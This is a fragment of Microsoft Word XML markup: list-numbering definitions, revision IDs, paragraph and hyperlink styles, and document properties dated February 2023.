    <w:tmpl w:val="9AB22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1752D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEF2F7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DD11C87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58AC4E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E3F0386"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D48AB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3994E4A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99E0B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C8773D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A46F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D58483E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="361890E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15F56CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06F8D7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3132E53"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C27A6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C81522D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8AD201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3530A77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D3AF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6D303E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6F249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4D3EA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="313C34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43B27F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C5780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C766AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A9B296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1A42950"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2662F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BD4A1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E208B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3742737"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="04B4CE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D8B3172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E045B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B45012"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1430C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8500EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91946F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913B6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A265B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CE4144"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25884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9767597">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1771463869">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="981495487">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2117358142">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1967656175">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1994334176">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="972639759">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="454761720">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1106461662">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="810515074">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="201406921">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1365325008">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="663437368">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1514497062">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1307515726">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1607689954">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1487480164">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1019544834">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1024018840">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="148254627">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1004893679">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="2090929291">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1751659874">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1164975616">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="16334399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059"/>
    <w:rsid w:val="0005301D"/>
    <w:rsid w:val="000A4483"/>
    <w:rsid w:val="000A4E5B"/>
    <w:rsid w:val="00134FC3"/>
    <w:rsid w:val="00183B62"/>
    <w:rsid w:val="0026569B"/>
    <w:rsid w:val="00297864"/>
    <w:rsid w:val="002C2B23"/>
    <w:rsid w:val="003D34B6"/>
    <w:rsid w:val="008976A8"/>
    <w:rsid w:val="008E72D2"/>
    <w:rsid w:val="009B7B11"/>
    <w:rsid w:val="00A24823"/>
    <w:rsid w:val="00B5619F"/>
    <w:rsid w:val="00B65B43"/>
    <w:rsid w:val="00BD0518"/>
    <w:rsid w:val="00CA171B"/>
    <w:rsid w:val="00D41059"/>
    <w:rsid w:val="00D62588"/>
    <w:rsid w:val="00E45B2A"/>
    <w:rsid w:val="00FF09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451C9FC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{08F5416F-4C2C-FC42-96CE-56316DBF5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1059"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B65B43"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B65B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1204</Words>
  <Characters>6869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2023-02-08T00:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-08T00:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>